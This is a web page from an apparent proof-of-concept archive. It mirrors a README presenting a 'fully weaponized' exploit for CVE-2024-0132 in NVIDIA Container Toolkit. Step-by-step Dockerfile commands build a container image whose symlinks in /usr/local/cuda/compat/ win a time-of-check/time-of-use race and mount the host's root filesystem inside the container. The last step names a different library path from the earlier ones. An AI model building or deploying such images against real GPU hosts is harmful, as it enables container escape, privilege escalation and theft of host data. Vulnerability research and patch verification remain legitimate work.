Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-0132 PoC — NVIDIA Container Toolkit 安全漏洞

Source
https://github.com/r0binak/CVE-2024-0132
Associated Vulnerability
Title:NVIDIA Container Toolkit 安全漏洞 (CVE-2024-0132)
Description:NVIDIA Container Toolkit 1.16.1 or earlier contains a Time-of-check Time-of-Use (TOCTOU) vulnerability when used with default configuration where a specifically crafted container image may gain access to the host file system. This does not impact use cases where CDI is used. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.
Description
CVE-2024-0132 – Fully Weaponized NVIDIA Container Toolkit Exploit
Readme
# CVE-2024-0132
CVE-2024-0132 PoC

Let's start by deciding on a base image. The arrangement of libraries in the system depends on what it will be. For example, for `alpine` it will be `/usr/lib64/`, for `ubuntu` it will be `/usr/lib/x86_64-linux-gnu`. We will use `ubuntu` as a base image.

```dockerfile
FROM ubuntu
```

The nvidia containter toolkit checks the libraries in `/usr/local/cuda/compat/` inside the container and then mounts them in the main library directory, for this image (`ubuntu`) this would be `/usr/lib/x86_64-linux-gnu`.

Links are also mounted, so you can mount any file and directory from the image to `/usr/lib/x86_64-linux-gnu`. This checks that the link is resolved inside the container, it cannot use multiple `../` for path traversal. However, this can be circumvented by using the in-container mount via `/usr/local/cuda/compat/` twice, hence TOCTOU.

Read more about the mechanism for mounting from `/usr/local/cuda/compat/`:

- https://github.com/NVIDIA/libnvidia-container/blob/4c2494f16573b585788a42e9c7bee76ecd48c73d/src/nvc_container.c#L61
- https://github.com/NVIDIA/libnvidia-container/blob/4c2494f16573b585788a42e9c7bee76ecd48c73d/src/nvc_mount.c#L768

```dockerfile
RUN mkdir -p /usr/local/cuda/compat/
```

Create two directories:
1. The original directory will contain a regular file with the contents of `test`

```dockerfile
RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
RUN echo test > /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
```

2. The second directory with the same name will contain a link with path traversal instead of a file.

```dockerfile
RUN mkdir -p /pwn/libdxcore.so.1337/
RUN ln -s ../../../../../../../../../ /pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs
```

The name `libdxcore.so` is chosen to satisfy filters. The major version (1337) must be different from the real driver version.

Create two links in `/usr/local/cuda/compat/`:
1. The first link will substitute the contents of the original directory `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/` for `/pwn/libdxcore.so.1337/`

```dockerfile
RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1
```

2. The second link mount `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs` to `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs`. During the check it will be a normal file, but at the moment of the mount it will be a link that was in `/pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs`, thus the host filesystem will be mounted in `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/`.

```dockerfile
RUN ln -s /usr/lib64/libdxcore.so.1337/libdxcore.so.1337.hostfs /usr/local/cuda/compat/libxxx.so.2
```
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →